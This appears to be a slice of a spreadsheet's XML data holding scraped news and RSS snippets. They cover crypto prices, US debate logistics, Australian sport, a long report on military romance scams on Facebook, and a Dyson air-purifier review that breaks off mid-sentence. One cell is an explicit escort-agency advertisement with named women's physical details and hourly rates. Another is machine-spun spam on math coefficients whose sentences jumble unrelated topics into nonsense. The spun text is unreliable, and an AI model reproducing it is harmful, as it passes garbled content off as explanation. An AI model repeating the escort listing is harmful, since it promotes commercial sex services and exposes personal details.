simple cause-and-effect formula. In fact, he cites Trump advisor Larry Kudlow, who wrote more than a decade ago that stock market performance is the “best barometer” of a country’s health – and a direct reflection on the president. “I have long believed that stock markets are the best barometer of the health, wealth and security of a nation,” Kudlow wrote during the George W. Bush administration. “And today’s stock market message is an unmistakable vote of confidence for the president.” Notably, Kudlow wrote that line in 2007 – just prior to the financial crisis and Great Recession. So perhaps stock markets aren’t the best barometer of the “health…of a nation” after all.</t>
  </si>
  <si>
    <t>Doing Litecoin price analysis this close to the halving could seem a bit redundant, but unfortunately, yet another support level has been broken by the bears. on July 18th we saw a massive surge from the bulls above the $100 resistance, but that didn’t last as long as one may have hoped as the bearish sentiment of the market has plunged the LTC price back down to $89 at press time. LTC chart by Trading View The price has decreased from $92 to $89 in the last 24 hours and there are just two weeks remaining before the halving. At this point, there are several breakouts that we can expect from Bitcoin, which will hopefully drag LTC alongside it. Should Bitcoin Test the $9,800 and $8,800 supports once again we could see yet another surge, taking LTC back to $102 on which it stopped on the 18th. However, that surge is not going to last long as a major downfall is expected right after the halving. Pair that up with the upcoming BTC market dominance and we don’t really paint a very positive picture for Litecoin. Overall, the market sentiment right now is bearish until Bitcoin tests its support levels. According to our Litecoin price analysis, the bulls have been beaten with Litecoin at this point and they won’t be coming back until the last few days before the halving. Advertisements</t>
  </si>
  <si>
    <t>Phil Lutton</t>
  </si>
  <si>
    <t>Jacco Verhaeren said nothing would undermine their clean sport message as Swimming Australia scrambled to explain their handling of Shayna Jack's doping result.</t>
  </si>
  <si>
    <t>The social media giant announced another quarter of strong revenue growth, as Wall Street appeared unfazed by the company's costly privacy settlement with the US Federal Trade Commission.</t>
  </si>
  <si>
    <t>The arrival of a Chinese spy ship that watched on as military forces from around the world trained for warfare off the Queensland coast was expected.</t>
  </si>
  <si>
    <t>Deb</t>
  </si>
  <si>
    <t>I created Tuffy Turtle for the purpose of showing that there is some good left in this world. I used… The post Tuffy Turtle – Character Insight appeared first on Storyland.</t>
  </si>
  <si>
    <t>Young Australians will be exposed to "nature-deficit disorder" unless we replant the trees removed from our urban areas.</t>
  </si>
  <si>
    <t>Danish Telugu Dictionary – travel dictionary to translate Danish to Telugu. Click on the list to show Danish or Telugu synonyms to understand the broader use of the words. The learning games help to build vocabulary. View the history of words used in the game again clickable for synonyms. Ideal for travelers, business people or … Continue reading Danish Telugu Dictionary →</t>
  </si>
  <si>
    <t>AAP</t>
  </si>
  <si>
    <t>Kyrgios, who started 2019 ranked world No.35, has slid to 52nd after an indifferent year in which his win-loss record stands at 13-10.</t>
  </si>
  <si>
    <t>Murray Wenzel</t>
  </si>
  <si>
    <t>Wallabies wrecking ball Samu Kerevi wants to test his budding centres partnership with Tevita Kuridrani against the world's best team in a fortnight.</t>
  </si>
  <si>
    <t>Chris Barrett</t>
  </si>
  <si>
    <t>Australia have a chance to further restore faith with the public in the Ashes but England have doubts how the tourists' post-sandpaper brand of cricket will hold up.</t>
  </si>
  <si>
    <t>Welcome to escorts in Thorncote Green SG19, covering the whole area of Bedfordshire. We have escorts serving the flats, homes and local hotels in Thorncote Green and the surrounding Bedfordshire areas. Thorncote Green Escort Bedfordshire Escort Services Thorncote Green Escorts - Girls Who Know How to Fulfill You in Bedfordshire Thorncote Green escorts are known in Bedfordshire for a wide variety of reasons. The first reason for its popularity is its beauty. The second reason is their skills when it comes to massages. When you are in the area, you will have to walk around a lot if you are a visitor and want to explore the city. After walking around this much, it is not surprising that your legs would be hurting and your body would need some pampering. You can book the services of one of these women and allow them to give you a soothing massage. If you want, you can even enjoy an erotic massage. Elite Thorncote Green escorts are the women who would not stop at anything when it comes to your entertainment. These women are very naughty, and they have a list of naughty, sexy and kinky games that they would like to play for you! You can prolong the excitement by beginning your day exploring the outdoor markets, the antique stores and sit at some of the cafes. These girls love to have fun, and you should not be surprised if you see her playing footsie with you under the table when you are sitting at a restaurant or a café! These escorts have a talent, and they want to be appreciated for it. With these ladies, you can finally be a man that you always wanted to be. These Thorncote Green escorts will bring out several qualities in you which will leave you pleasantly surprised. Age is just in mind and, it doesn’t matter anyway when you are with these women. There are quite a lot of men who feel depressed as they get older since they think that their years of fun are over for good. They believe that with age, they would no longer be able to enjoy the companionship of women at all. However, now you can not just enjoy being with Thorncote Green women, but you can be with sexy, hot, young women who would make you grow wild with desire. Escort Name: Sia Location: Thorncote Green (SG19 1) Nationality: Australian Spoken Language: English, Arabic Age: 22 years old Weight: 61.8kg (136lb) (9st - 10lb) Height: 5 feet 1 inches (154.94cm) Dress Size: M Shoe Size: 42 Hair Leigh: Long Hair Color: Jet Black Eye Color: Blue Breast: Natural Breast Size: C Pubic Hair: Shaved Completely Tattooed: Yes Piercings: No Smoking: Occasionally Drinking: Occasionally Availability Area: Thorncote Green Outcall: Bedfordshire Incall Rates Start: from £100 p/h Outcall Rates Start: from £120 p/h Book Sia Escort Name: Leila Location: Thorncote Green (SG19 1) Nationality: Scottish Spoken Language: English, Portuguese Age: 20 years old Weight: 59.1kg (130lb) (9st - 4lb) Height: 5 feet 8 inches (172.72cm) Dress Size: M Shoe Size: 46 Hair Leigh: Medium-Length Hair Color: Brown Eye Color: Green Breast: Natural Breast Size: B Pubic Hair: Trimmed Tattooed: Yes Piercings: No Smoking: Yes Drinking: Occasionally Availability Area: Thorncote Green Outcall: Bedfordshire Incall Rates Start: from £100 p/h Outcall Rates Start: from £120 p/h Book Leila Escort Name: Eldora Location: Thorncote Green (SG19 1) Nationality: Jamaican Spoken Language: English, Finnish Age: 20 years old Weight: 52.3kg (115lb) (8st - 3lb) Height: 5 feet 5 inches (165.10cm) Dress Size: M Shoe Size: 40 Hair Leigh: Medium-Length Hair Color: Brown Eye Color: Blue Breast: Natural Breast Size: DD Pubic Hair: Trimmed Tattooed: No Piercings: No Smoking: No Drinking: No Availability Area: Thorncote Green Outcall: Bedfordshire Incall Rates Start: from £100 p/h Outcall Rates Start: from £120 p/h Book Eldora Escort Name: Paulina Location: Thorncote Green (SG19 1) Nationality: American Spoken Language: English, French Age: 48 years old Weight: 52.3kg (115lb) (8st - 3lb) Height: 5 feet 11 inches (180.34cm) Dress Size: S Shoe Size: 42 Hair Leigh: Long Hair Color: Brunette Eye Color: Gray Breast: Natural Breast Size: B Pubic Hair: Shaved Completely Tattooed: No Piercings: Yes Smoking: Occasionally Drinking: Occasionally Availability Area: Thorncote Green Outcall: Bedfordshire Incall Rates Start: from £100 p/h Outcall Rates Start: from £120 p/h Book Paulina Escort Name: Brandy Location: Thorncote Green (SG19 1) Nationality: American Spoken Language: English, Icelandic Age: 41 years old Weight: 68.6kg (151lb) (10st - 11lb) Height: 5 feet 7 inches (170.18cm) Dress Size: XXL Shoe Size: 41 Hair Leigh: Short Hair Color: Brown Eye Color: Blue Breast: Natural Breast Size: B Pubic Hair: Shaved Mostly Tattooed: No Piercings: Yes Smoking: No Drinking: Yes Availability Area: Thorncote Green Outcall: Bedfordshire Incall Rates Start: from £100 p/h Outcall Rates Start: from £120 p/h Book Brandy Escort Name: Leilani Location: Thorncote Green (SG19 1) Nationality: Israeli Spoken Language: English, French Age: 24 years old Weight: 55.5kg (122lb) (8st - 10lb) Height: 5 feet 10 inches (177.80cm) Dress Size: S Shoe Size: 37 Hair Leigh: Short Hair Color: Natural Eye Color: Gray Breast: Natural Breast Size: B Pubic Hair: Shaved Mostly Tattooed: No Piercings: No Smoking: No Drinking: Yes Availability Area: Thorncote Green Outcall: Bedfordshire Incall Rates Start: from £100 p/h Outcall Rates Start: from £120 p/h Book Leilani Thorncote Green Brazilian Escort, Thorncote Green Scottish Escort, Thorncote Green Walsh Escort, Thorncote Green Independent Escort, Thorncote Green Female Escort, Thorncote Green Cheap Escort, Thorncote Green Chinese Escort, Thorncote Green Blonde Escort, Thorncote Green Incall Escort, Thorncote Green French Escort, Thorncote Green Black Escort, Thorncote Green Outcall Escort, Thorncote Green Bisexual Escort, Thorncote Green Irish Escort, Thorncote Green Mature Escort, Thorncote Green British Escort, Thorncote Green Brunette Escort, Thorncote Green Horny Escort, Thorncote Green Asian Escort, Thorncote Green Gay Escort, Thorncote Green Busty Escort, Thorncote Green Young Escort, Thorncote Green Male Escort, Thorncote Green Ebony Escort, Thorncote Green Indian Escort, Thorncote Green Indian Escort, Thorncote Green Massage Escort , Thorncote Green Polish Escort, Thorncote Green Porn Escort, Thorncote Green Teen Escort, Thorncote Green Best Escort, Thorncote Green Agency Escort, Thorncote Green Erotic Escort, Thorncote Green Spanish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Thorncote Green appeared first on Escort Info UK.</t>
  </si>
  <si>
    <t>Cameron Newbold &amp; Taj Stubber</t>
  </si>
  <si>
    <t>Royals and Railways fight off challenges to stitch up top two spots, Denmark-Walpole remain in the hunt</t>
  </si>
  <si>
    <t>Police are searching for a 23-year-old man reported missing from Dundee.</t>
  </si>
  <si>
    <t>lendlease</t>
  </si>
  <si>
    <t>What What Is a Coefficient in Math Is – and What it Is Not If you still have questions after reading this column, you should check with a seasoned family law. Procedures To tackle a literal equation for a single letter the moment it regards the others follow the precise steps as in chapter 2. This guide covers the fundamentals of filing for divorce in Maryland. Rather, it is an effect of the variety of classes that were selected. Sometimes 1 method is much better than another, and in some instances, the symmetric property of equality is also valuable. Set the pay raise during the aforementioned formula. The Battle Over What Is a Coefficient in Math and How to Win It In case it is negative, the inequality will be reversed. It can be helpful in trying to predict a particular stock’s tendencies and calculate the overall risk. It is employed in statistics to be aware of the strength of a couple of relations. The coefficient of the most important term is called the top coefficient. A value of zero for r doesn’t mean that there’s no correlation, there might be a nonlinear correlation. The arguments necessary essaysource com to work out the correlation coefficient are the 2 ranges of information which will want to go compared. What Is a Coefficient in Math – What Is It? In the event the points are scattered about then there might be no correlation. In case it’s negative, the inequality is going to be reversed. Though the Correlation Coefficient spends a wonderful time period in positive territory, it’s negative the good bulk of the moment. Decomposition Method Many individuals may find out how to factor by employing trial and error, but this can be hard to grasp and is difficult to explain. Be aware that correlations should only be calculated for a whole selection of data. Latent class analysis resembles cluster analysis. You don’t need to be concerned about that as your ballistic software will deal with this. The mean of the errors have to get distributed around 0 in order to stop any bias. It has to be distributed around 0 in order to prevent any bias. Just showing an idea works in plenty of cases isn’t sufficient to earn a notion into a theorem. Reality is considerably more messy. It, in fact, lies somewhere in the center. Before you look at the statistical measures for goodness-of-fit, you must analyze the residual plots. Let’s say you have a sequence of numbers that for some reason you will have to cope with mathematically. Before you consider the statistical measures for goodness-of-fit, you need to check the residual plots. Put the values of both variables you want to correlate into two columns of the precise length. Some examples are below. A number alone is known as a Constant. Why Almost Everything You’ve Learned About What Is a Coefficient in Math Is Wrong Thus, there’s no need to restrict the most amount of RAM could be found in a single purchase. The nail flying point forward has an extremely highsectional density as it’s long and skinny. It is going to be a very good approximation to our original function. The degree of a polynomial is the quantity of the utmost degree term. Even though the Correlation it spends a good amount of time in positive territory, it’s negative the vast majority of the moment. The coefficient of friction is dependent upon the objects that are causing friction. The Benefits of What Is a Coefficient in Math This technique produces the very best line possible given the simple fact that we’ve just a subset of all potential data. In the event the prediction vector has a huge scalar product with the output of a prospective parent, smaller product for a few other parents. The function will be placed such that the beginning of the prefix data is aligned. Therefore, we wind up adding to the x-coordinate. The expression within the brackets can currently be factored using the decompostion approach. For example, a normal propane compressor may have a k-value at suction conditions of 1.195. The Little-Known Secrets to What Is a Coefficient in Math The idea of randomness is really hard to define precisely. In several instances, introducing heuristics may boost the random algorithm. In several instances, it may boost the random algorithm. It comes into play when you own a dataset with several capabilities. It is a rather hard to develop a more efficient strategy. Otherwise, you’re less likely to see positive outcomes. Instruction for Windows Users Please make sure the image that you desire to print is visible on the monitor. This property, sometimes known as the addition-subtraction property, is 1 way which we may generate equivalent equations. Assuming you own a user’s permission, it is not hard to share some activities automatically. Entering your story is easy to do. The sum of the goods in the rightmost column is 2.969848. The 2 properties are believed to be negatively co-related. A course like Mastering Excel will teach you all of the basics you have to get started with Excel, along with teaching you more advanced functions that are included within the application. Algebra can resemble a confusing subject. One must be sound in mathematics in order to begin machine learning. In quotes, you’ve got to specify where the data file can be located on your computer. Testing set is critical to validate our results. Well, maybe you do and maybe you don’t. The rest of this dilemma is 3. You will locate urge for constant involvement in your house’s construction. Pick any 2 things that you use in your day-to-day life and which are related. Finding out how to cope with a linear equation will give you an easy comprehension of algebra so you will be able to handle more elaborate equations later. Some particular coefficients that happen frequently in mathematics have gotten a name. Finding out how to tackle a linear equation will give you an easy comprehension of algebra so you are going in order to handle more elaborate equations later.</t>
  </si>
  <si>
    <t>Washington, DC – The first United States Democratic debate last month offered few surprises, and second is not expected to offer many more. But with the two leading progressive candidates set to take the stage together for the first time on Tuesday, many Americans hope this month’s debate will help highlight even the most subtle policy differences. And for those who are not at the top of the polls, this week’s debate may be their last opportunity to break out from the crowd. As 20 candidates prepare to take the stage on Tuesday and Wednesday, here is what you need to know about the second debate. 1. When and where will the debate take place? As before, the debate will take place over two nights: Tuesday and Wednesday. Each night will host 10 candidates and will begin at 8pm EST (00:00 GMT) and will last for two hours. Candidates will take the stage at the Fox Theatre in downtown Detroit, Michigan, for the debate, which is hosted by CNN. 2. Who are the candidates? Although there are officially 25 candidates (so far), only 20 will be featured during the debate because the other five did not meet the requirements to take the stage. On Tuesday, Senators Amy Klobuchar, Bernie Sanders and Elizabeth Warren, Representative Tim Ryan, South Bend, Indiana, Mayor Pete Buttigieg, Montana Governor Steve Bullock, former US Representatives Beto O’Rourke and John Delaney, former Colorado Governor John Hickenlooper and author Marianne Williamson will take the stage. On Wednesday, Senators Michael Bennet, Cory Booker, Kristen Gillibrand and Kamala Harris, Representative Tulsi Gabbard, New York Mayor Bill de Blasio, Washington Governor Jay Inslee, former Vice President Joe Biden, former Secretary of Housing and Urban Development Julian Castro and entrepreneur Andrew Yang will face-off. 3. A new face? And who won’t be on the stage at all? It will be Bullock’s first appearance on the debate stage. He failed to qualify for the first debate last month. He replaces Representative Eric Swalwell, who dropped out of the presidential race after the first debate. Five candidates – Representative Seth Moulton, Miramar, Florida, Mayor Wayne Messam, former US Senator Mike Gravel, former US Representative Joe Sestak and billionaire Tom Steyer – failed to meet the minimum requirements to get on the stage this week. In order to qualify, the candidates had to receive at least one percent in three or more national polls or early state polls, or they had to raise money from at least 65,000 unique donors. 4. How does it work? Each candidate will have 60 seconds to answer questions, and will be given 30 seconds for follow-ups and rebuttals. Unlike the first debate, CNN said there would be no show of hands or one-word, down the line questions. CNN also said the podium placement was decided based on polling numbers, with the two candidates polling the highest from each night sharing centre-stage. 5. What happened during the first debate? The first debate offered few major surprises, but over the course of two nights, Americans did see some heated exchanges over healthcare, race and immigration – highlighting some important points of divergence. Candidates battled over whether to abolish private insurance and shift to a Medicare-for-all system, which is advocated by the more progressive candidates. Democratic presidential candidates take part in the first night of the Democratic presidential debate [File: Joe Raedle/Getty Images/AFP] Although most candidates agree that immigration reform is needed, and family separation and child detention must end, there were disagreements about whether border crossings by migrants should be decriminalised. During one of more emotional exchanges, Harris challenged Biden’s stance on the bussing of students to desegregate public schools during the 1970s. She shared her own experience of being bussed as a child two decades after the Brown v Board decision to end the separate but equal policy in the US education system. 6. Will this debate be different? Americans are still not expecting to see major confrontation, but the second debate will host more interesting match-ups, including that between leading progressive candidates Sanders and Warren. The two candidates will likely try to highlight their points of divergence in order to sway voters to their side, but Sanders has told US media he will not attack Warren because he sees her as an ally. Many believe that Biden has some ground to gain after a less-than-stellar performance during the second debate. Without Sanders – one of the former vice president’s main critics in the race – on the stage, Biden may be able to do just that. But after the first debate, all eyes will also be how Harris, and other candidates go after and react to the frontrunner. 7. What are the top issues? Expect to see moderators and candidates bring up the economy, healthcare, immigration and some foreign policy issues like Iran. Race, which did come up during the first debate, is also expected to be a major issue discussed. President Donald Trump has made several racist remarks over the last month, bringing strong condemnation from candidates and the Democratic Party as a whole. 8. How many people watched the first debate? More than 18 million people watched the second night of first debate, according to Nielsen ratings, setting a record for a Democratic primary debate. (The first night had more than 15 million viewers.) Although the number fell short of the all-time primary record set in 2016 when 24 million people tuned in to watch the first debate performance of Trump, it still exceeded many predictions. 9. Will Trump watch? Trump is expected to watch and will likely tweet during the second debate. Although he was en route to Japan for the G-20 summit during the first debate, he still weighed in, calling it “BORING” on Twitter. 10. When is the next debate? The next debate will take place on the nights of September 12-13. It will be hosted by ABC News in partnership with Univision in Houston, Texas. Source link</t>
  </si>
  <si>
    <t>Source: https://www.techspot.com/news/81132-house-passes-robocall-bill-near-unanimous-support.html House passes robocall bill with near unanimous support The Stopping Bad Robocalls Act will allow law enforcement to pursue robocall scammers more aggressively. It increases the penalties that can be imposed on fraudulent calls and requires service providers to implement call authentication platforms, specifically SHAKEN/STIR, by 2020. It will also call for the Federal Communications Commission to redefine… Source: https://www.techspot.com/news/81132-house-passes-robocall-bill-near-unanimous-support.html The post House passes robocall bill with near unanimous support appeared first on CYBERDEN.</t>
  </si>
  <si>
    <t>A violent thug has been handed a seven-year extended sentence for holding a knife to a student's throat.</t>
  </si>
  <si>
    <t>Danny Morgan</t>
  </si>
  <si>
    <t>A police officer says the High Court was ill-informed when it criticised the way police used gangland lawyer Nicola Gobbo as a source, but admits he has not read the court's full judgement.</t>
  </si>
  <si>
    <t>Services across the country are hit by major disruption as the UK hits the July temperature record. The post UK heatwave: Rail delays on UK’s hottest July day appeared first on Education - Career - Word Games - Distance learning.</t>
  </si>
  <si>
    <t>MELANIA TRUMP, 49, turned heads in a vibrant green midi dress and a pair of killer high heels as she attended an event at Kennedy Center last night. Daily Express :: Life and Style Feed</t>
  </si>
  <si>
    <t>FORT PIERCE, Fla. — On a Monday afternoon in June 2017, Renee Holland was draped in an American flag at Philadelphia International Airport, waiting for a soldier she had befriended on Facebook. The married 56-year-old had driven two hours from Delaware to pick him up. Their blossoming online friendship had prompted her to send him a care package and thousands of dollars in gift cards. She also wired him $5,000 for plane tickets to return home. Now she was looking for a buff, tattooed man in uniform, just like in his Facebook photos. But his flight was not on the airport arrivals board. Then a ticket agent told her the flight didn’t exist. From there, Ms. Holland said, it was a daze. She walked to her car, with “Welcome Home” written on the windows, and sobbed. She had spent much of her family’s savings on the phantom soldier. “There’s no way I can go home and tell my husband,” she remembered telling herself. She drove to a strip mall, bought sleeping pills and vodka, and downed them. The man in the Facebook pictures had no idea who Ms. Holland was. His real identity was Sgt. Daniel Anonsen of the Marine Corps, and he had joined the social network a decade earlier to keep in touch with friends and family in Maryland. Now he was contending with dozens of Facebook impostor accounts using stolen photos of him at the gym, at his brother’s wedding and in Afghanistan. “For every one that I deleted, there was 10 more that were popping up,” he said. “It turns my stomach.” Ms. Holland and Mr. Anonsen represent two sides of a fraud that has flourished on Facebook and Instagram, where scammers impersonate real American service members to cheat vulnerable and lonely women out of their money. The deception has entangled the United States military, defrauded thousands of victims and smeared the reputations of soldiers, airmen, sailors and Marines. It has also sometimes led to tragedy. The scheme stands out for its audacity. While fraud has proliferated on Facebook for years, those running the military romance scams are taking on not only one of the world’s most influential companies, but also the most powerful military — and succeeding. Many scammers operate from their phones in Nigeria and other African nations, working several victims at the same time. In interviews in Nigeria, six men told The New York Times that the love hoaxes were lucrative and low risk. “Definitely there is always conscience,” said Akinola Bolaji, 35, who has conned people online since he was 15, including by posing on Facebook as an American fisherman named Robert. “But poverty will not make you feel the pain.” Facebook has long had a mission to “connect the world.” But in the process, it has created a global gathering place where the crooks outnumber the cops. For digital criminals, Facebook has become a one-stop shop. It has plenty of photos of American service members. Creating an impostor account can be easy. Facebook groups for single women and widows are full of targets. Scammers can message hundreds of potential victims. And they congregate in their own Facebook groups to sell fake accounts, Photoshopped images and scripts for pulling off the cons. “There are so many people out there that are lonely, newly divorced, maybe widowed,” said Kathy Waters, head of a group called Advocating Against Romance Scams. “Everybody wants somebody to love and to listen to them and hear them. And these scammers know the right words to say.” Facebook said it requires people to use their real identities on its sites. To eliminate impostor accounts, it has invested in technology and more human reviewers. The company works with the authorities to prosecute scammers. Billions of fake Facebook accounts have been blocked over the past year, the company said, though its estimate for the number of active fakes has steadily risen to about 120 million. It declined to disclose a figure for Instagram. “That job is not finished and we are committed to sharing our progress,” Facebook said in a statement. Kim Joiner, a deputy assistant to the secretary of defense who oversees the military’s social media accounts, said her team works with Facebook to remove impostors and was pleased with the company’s response. “I’m absolutely satisfied,” she said. When shown that searches by The Times for three top American generals on Facebook and Instagram had yielded more than 120 impersonators, Ms. Joiner said it was “disturbing.” She said she did not know why the fakes were not eradicated. “I mean, the numbers are astounding,” she said. ‘My wife’ To her friends and family, Ms. Holland was known as trusting and impulsive. Born in Philadelphia, she had spent time in Arizona and Missouri, working as a gardener and in an auto shop. She met her fifth husband, Mark Holland, when she offered him a ride off the side of the road. In 2001, she moved to Delaware to care for her sick mother. When her mother died in September 2016, Ms. Holland found herself depressed and with free time. She noticed her sister glued to her smartphone, scrolling through Facebook. So she bought a smartphone, too, and created a Facebook profile. A few weeks later, Ms. Holland got a Facebook message from a stranger. The profile showed a man in uniform named Michael Chris. He told her he disarmed bombs in Iraq. A selfie of Mr. Anonsen that impostor accounts used on Facebook and Instagram.Credit Ms. Holland said she initially felt uneasy, but the conversation flowed. Mr. Chris told her about life at war. She made him laugh. “He kept saying, ‘You’re really funny. And you make it easier for me just to know that somebody is at home that I can talk to,” she said. “How cool is this that I could really make somebody feel better?” Over several months, their relationship deepened. Ms. Holland said she felt motherly. Mr. Chris began calling her “my wife.” What Ms. Holland did not know was that the man in Mr. Chris’s photos was actually Mr. Anonsen — and that his images were all over the internet. Mr. Anonsen grew up in suburban Maryland, about two hours from Ms. Holland’s Delaware home. The oldest of four boys, he said he had “wanted to be in the military since the day I could remember.” After graduating high school in 2006, he joined the Marines. In 2010, while browsing Facebook, he discovered hundreds of unsolicited messages from women he did not know. Many said they loved him. They asked why, after months of correspondence, he was not responding. They implored him to write back. Confused, Mr. Anonsen searched for his name on Facebook and found dozens of impostor accounts. The problem quickly mushroomed. The women who thought he had duped them harassed his parents online. A new real-life girlfriend grew suspicious. “She started questioning everything about what I was doing,” said Mr. Anonsen, now 31. “It actually ended our relationship.” Mostly searching variations of his name, The Times found 65 profiles on Facebook and Instagram that used Mr. Anonsen’s photos. When The Times reported the fakes to the sites, 24 were removed over more than six months. Many more accounts have used Mr. Anonsen’s photos with different names. One used the name Michael Chris — and began messaging Ms. Holland in late 2016. Several months into their online chats, Mr. Chris asked Ms. Holland for money. She bought him iTunes gift cards so, he said, he could buy more minutes on his cellphone. She sent money for beer for his birthday. And she paid for medicine for what he said was a sick daughter, Annabelle, in California. A boarding pass that was edited to include the false flight details the scammer gave Ms. Holland.Credit In June 2017, she wired $5,000 for Mr. Chris and a friend to fly to Philadelphia from Iraq. She sneaked the money from a pile of cash she and her husband hid in their bedroom, which represented their life savings. Mr. Chris promised to pay her back when he got there. He never arrived. That was when Ms. Holland took the sleeping pills and vodka. Days later, she awoke in a hospital bed. “You open your eyes, and the person you didn’t want to face the most is sitting next to you,” she said. “Mark.” Mr. Holland knew about his wife’s Facebook friend. An Army Airborne veteran himself, with tours in Honduras and South Korea, he once helped Ms. Holland prepare a care package of snacks, underwear and foot powder for Mr. Chris. (The package was returned.) Now he said he realized his wife’s relationship with this man had gone further than he understood. “I had a lot of anger,” Mr. Holland, 53, said in an interview last year. “But I also had a little bit of compassion because I knew how bad she felt.” When Ms. Holland returned home from the hospital, her relationship with her husband and her then 82-year-old father, whom she was caring for, was strained. One person kept talking to her: Mr. Chris. “He wanted to make it up to me,” she said. “He was going to sit there, look my husband in the eye and tell him how sorry he was and pay him back. Ms. Holland said she had been convinced that it was a scam. But Mr. Chris swore to her that he had been delayed by a military operation. She received an email from someone claiming to be Gen. Stephen Townsend of the Army, confirming the story. There were soon new photos of Mr. Chris injured in war, documents showing he was due big insurance payments and promises she would be reimbursed for more than she had lost. She just needed to get him home. Twice more, Ms. Holland sent money for airfare, partly with credit cards, without her husband’s knowledge. Mr. Chris never showed. The Hollands lost $26,000 to $30,000. To start afresh, they moved to Fort Pierce last year. But the strains remained. Mr. Holland was arrested on domestic violence charges in August 2018, according to a police report. Ms. Holland dropped the charges. She said in an interview last year that there had been another incident in 2017. On Dec. 23, 2018, Mr. Holland shot and killed Ms. Holland and her father at their new home. Mr. Holland then turned the gun on himself. The St. Lucie County Sheriff’s Office said Mr. Holland left no indication of motive. Out of their hands By the end of 2017, Mr. Anonsen had quit Facebook and Instagram in frustration. He estimated that he had reported roughly 200 impostor accounts to Facebook. The company removed some, but said many didn’t violate its rules. When he sent messages to Facebook pleading for help, he received automated responses. Mr. Anonsen told his platoon commanders about the issue, then his battalion’s intelligence officers. All said it was out of their hands. “I thought military intelligence would be able to type a couple of zeros and ones and it would all go away, but it’s not that simple,” said Mr. Anonsen, who left the military last year and now works on a ship in the Gulf of Mexico. His experience reflects the futility of stopping military romance scams: No one appears to be able to help. “I don’t know what else we can be doing,” said Ms. Joiner, the Defense Department official. She called Facebook impostors “the new norm” and said the Pentagon combats them with education and reporting fake accounts to Facebook. On Facebook and Instagram, The Times recently found more than 120 accounts impersonating three of the military’s highest-ranking generals. One Instagram account posing as Gen. Joseph F. Dunford Jr., chairman of the Joint Chiefs of Staff, had posted a photo of a child in a hospital bed, asking for donations to Nigeria via Western Union. Ms. Joiner said when the Pentagon reported fakes, Facebook took them down. Yet when The Times reported 46 of the accounts to Instagram, the site responded within 24 hours that none violated its rules, without explaining why. The Times later provided the list of impostors to the Pentagon. Four months later, 25 accounts were still active. “I just don’t know how to influence it more than we are,” Ms. Joiner said. The Army’s Criminal Investigation Command, which investigates crimes involving Army personnel, said it fields calls from hundreds of victims of romance scams a month. But it said its investigators cannot look into those reports because the perpetrators and victims are civilians. “Our jurisdiction stops there,” said Chris Grey, a spokesman for the division. He said they distribute public warnings and urge service members to protect their identities. There are no exact figures on how many service members and civilians have been affected. The F.B.I. said it received nearly 18,500 complaints from victims of romance or similar internet scams last year, with reported losses exceeding $362 million, up 71 percent from 2017. The F.B.I. investigates a fraction of those reports, said James Barnacle, head of the F.B.I.’s money laundering unit. Many victims lose a few thousand dollars, and “it’s really hard for an agency like the F.B.I. to work something that low, just because there’s so many cases that come in our door,” he said. Facebook said it constantly removes impostor accounts with the help of software, human reviewers and user reports. Its software also scans for scammers and locks accounts until owners can provide proof of identity. It has a video warning people of scams. The hoax has created a brigade of victims’ advocates. One is the group Advocating Against Romance Scams, run by Ms. Waters, a health care worker from Fresno, Calif., and Bryan Denny, a retired Army colonel. Since 2017, they have met five times with Facebook and with 11 separate congressional offices to lobby for a law to hold social media sites responsible for such scams. Since last year, Facebook has used Colonel Denny in tests of a new system to quickly remove impostors of commonly impersonated service members. He provided Facebook with 51 photos that his imitators used. Months later, he said, the fakes still showed up. In an email to Ms. Waters and Colonel Denny last year, a Facebook spokeswoman wrote, “I understand what it must look like to you guys. I hope we can redeem ourselves.” Finding Michael Chris Ms. Holland left behind a trail of clues about Mr. Chris. It started with receipts from Western Union and MoneyGram, which wire money around the world. Those revealed that Ms. Holland had not sent money directly to Mr. Chris, but to people in places like New Mexico and Puerto Rico. Mr. Chris had told Ms. Holland they were “Army agents.” In reality, the F.B.I.’s Mr. Barnacle said, they were probably “money mules” who laundered payments to confuse victims and the authorities. They could be accomplices or victims themselves. One of the names on Ms. Holland’s receipts was Maria, a Greek immigrant in New Jersey. She spoke on the condition of anonymity to hide her involvement in the scam from her adult children. Maria, 57, said she joined Facebook after her husband died in 2010. She quickly heard from men in uniform and developed a relationship with a supposed Army sergeant named Jacob. He showered her with compliments, called her “my Queen” — and then requested money. Over two years, Maria sent roughly $15,000. She pawned her jewelry and stopped paying her mortgage. When her bank blocked her from sending more, her scammer persuaded her to forward a payment from someone else: Ms. Holland. “Am tired disappointed depressed I lost everything I don’t know what ales to do,” Maria wrote to her scammer in messages reviewed by The Times. “Just give me your trust one more time,” the person wrote. “Okay one time,” Maria responded. In 2017, the bank foreclosed on Maria’s house. To save her home, she increased her working hours at a factory to seven days a week. “I don’t know how humans can do that to another human,” she said. The ‘Yahoo Boys’ All of the clues ultimately pointed to Nigeria. Maria’s receipts showed her payments went to someone in Nigeria named Victor Ohaja. That name had also appeared in Ms. Holland’s receipts. In her final payment to Mr. Chris, $350 went to Mr. Ohaja. His connection to the person purporting to be Mr. Chris was unclear. According to the Internet Pro...</t>
  </si>
  <si>
    <t>William McInnes</t>
  </si>
  <si>
    <t>The ASX keeps testing records as the banks enjoy a good run.</t>
  </si>
  <si>
    <t>Editor</t>
  </si>
  <si>
    <t>In this Dyson air purifier review and comparison we put Dyson to the test and compare the TP04 vs. TP02 vs. DP04 vs. DP01 vs. HP04 vs. HP02 vs. BP01. Let’s do it! Dyson TP04 – Dyson TP02 – Dyson DP04 – Dyson DP01 – Dyson HP04 – Dyson HP02 – Dyson BP01 – The selection of Dyson air purifiers can be broken down into a 4 different model families that range in size and features. For the sake of simplicity, you can think about the Dyson naming convention using the key below. BP Series = Body Cooling Air Purifiers: This series only includes the Dyson Pure Cool Me BP01 air purifier and is the newest purifier to his the market from Dyson. It’s small and designed purifier in a small space. TP Series = Tower Cooling Air Purifiers: This series includes the Dyson Pure Cool TP01, TP02, and TP04. These are tall, tower-style cooling air purifiers that use the Pure Cool Dyson technology to deliver cooled purifier air to large spaces. DP Series = Desk Cooling Air Purifiers: This series includes the Pure Cool DP01, DP02, DP03, and DP04. These models are cooling air purifiers designed to sit on your desk or tabletop. They use the Pure Cool Dyson technology and can have a round or oval amp, depending on the model. HP Series = Heating Air Purifiers: This series includes the HP01, HP02, and HP04. These purifiers are more compact, like the DP series, but larger than the BP series. In addition, they have both heating and cooling capabilities. The design of Dyson air purifiers have a few common elements between all models. These elements are generally consistent across all Dyson models and makes up some of the notable features that makes a Dyson a Dyson. Some of these design elements include: 1. Bladeless Airflow Movement All Dyson air purifiers are bladeless. What’s that mean? As mentioned 